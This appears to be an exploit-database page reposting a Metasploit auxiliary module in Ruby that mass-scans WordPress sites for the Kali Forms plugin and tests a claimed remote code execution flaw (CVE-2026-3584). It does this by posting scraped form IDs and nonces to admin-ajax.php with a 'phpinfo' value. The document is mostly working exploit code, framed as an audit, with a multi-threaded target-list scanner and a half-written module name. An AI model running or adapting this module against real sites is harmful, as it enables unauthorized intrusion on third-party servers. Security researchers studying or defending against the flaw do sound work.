Share
## https://sploitus.com/exploit?id=PACKETSTORM:219170
==================================================================================================================================
    | # Title     : WordPress Kali Forms 2.4.9 Remote Code Execution Assessment                                                      |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://fr.wordpress.org/plugins/kali-forms/                                                                     |
    ==================================================================================================================================
    
    [+] Summary    : This Metasploit auxiliary module is designed for security auditing of WordPress sites using the Kali Forms plugin, focusing on detecting potential exposure to a Remote Code Execution (RCE) condition.
    
    [+] POC        :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    ##
    
    require 'set'
    require 'json'
    require 'uri'
    require 'fileutils'
    require 'thread'
    
    class MetasploitModule < Msf::Auxiliary
      include Msf::Exploit::Remote::HttpClient
      include Msf::Auxiliary::Scanner
      include Msf::Auxiliary::Report
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'WordPress Kali Forms - ',
            'Description' => %q{
             version with MSF compatibility improvements:
                     },
            'Author' => ['indoushka'],
            'License' => MSF_LICENSE,
            'References' => [
              [Msf::Reference::CVE, '2026-3584']
            ]
          )
        )
    
        register_options([
          OptInt.new('THREADS', [true, 'Concurrent targets', 10]),
          OptPath.new('TARGETS_FILE', [true, 'List of target hosts']),
          OptInt.new('TIMEOUT', [true, 'HTTP timeout', 15]),
          OptString.new('EXPLOIT_LEVEL', [true, 'SAFE_AUDIT / RCE_ONLY / FULL', 'SAFE_AUDIT'])
        ])
      end
    
      def setup
        @lock = Mutex.new
        @stats = { scanned: 0, vulnerable: 0, failed: 0 }
    
        @loot_dir = File.join(Msf::Config.loot_directory, "kali_forms_#{Time.now.to_i}")
        FileUtils.mkdir_p(@loot_dir)
      end
    
      def normalize_target_url(target, path = nil)
        return nil if target.nil?
    
        base = target =~ /^https?:\/\// ? target : "http://#{target}"
        base = base.chomp('/')
    
        return base if path.nil?
        "#{base}/#{path.sub(/^\//, '')}"
      end
    
      def update_stats(key)
        @lock.synchronize { @stats[key] += 1 }
      end
    
      def run
        targets = File.readlines(datastore['TARGETS_FILE'])
                      .map(&:strip)
                      .reject { |l| l.empty? || l.start_with?('#') }
    
        queue = Queue.new
        targets.each { |t| queue << t }
    
        print_status("Starting scan on #{targets.length} targets")
    
        datastore['THREADS'].times.map do
          framework.threads.spawn("kali-scanner", false) do
            loop do
              begin
                target = queue.pop(true)
              rescue ThreadError
                break
              end
    
              scan_target(target)
            end
          end
        end.each(&:join)
    
        print_status("Done. Scanned=#{@stats[:scanned]} Vulnerable=#{@stats[:vulnerable]}")
      end
    
      def scan_target(target)
        update_stats(:scanned)
    
        base = normalize_target_url(target)
        return unless base
    
        res = send_request_cgi(
          'method' => 'GET',
          'uri' => normalize_target_url(base, '/'),
          'timeout' => datastore['TIMEOUT']
        )
    
        unless res&.code == 200
          update_stats(:failed)
          return
        end
    
        if res.body =~ /kaliforms|KaliFormsObject/i
          print_good("[+] Potential target: #{target}")
    
          if datastore['EXPLOIT_LEVEL'] == 'SAFE_AUDIT'
            return
          end
    
          form_ids = res.body.scan(/data-id=["'](\d+)["']/i).flatten.uniq
          nonce = res.body[/ajax_nonce["']\s*:\s*["']([a-f0-9]+)["']/i, 1]
    
          return if form_ids.empty? || nonce.nil?
    
          form_ids.each do |fid|
            if test_rce(base, fid, nonce)
              update_stats(:vulnerable)
              print_good("[!!!] Vulnerable: #{target} FormID=#{fid}")
    
              report_vuln(
                host: URI.parse(base).host,
                name: 'Kali Forms RCE',
                refs: [Msf::Reference.new('CVE', '2026-3584')],
                info: "Form ID #{fid}"
              )
            end
          end
        end
      rescue => e
        update_stats(:failed)
        vprint_error("#{target} => #{e.message}")
      end
    
      def test_rce(base, fid, nonce)
        res = send_request_cgi(
          'method' => 'POST',
          'uri' => normalize_target_url(base, '/wp-admin/admin-ajax.php'),
          'vars_post' => {
            'action' => 'kaliforms_form_process',
            'data[formId]' => fid,
            'data[nonce]' => nonce,
            'data[thisPermalink]' => 'phpinfo'
          },
          'timeout' => datastore['TIMEOUT']
        )
    
        res&.body&.include?('PHP Version')
      rescue
        false
      end
    end
    
    
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================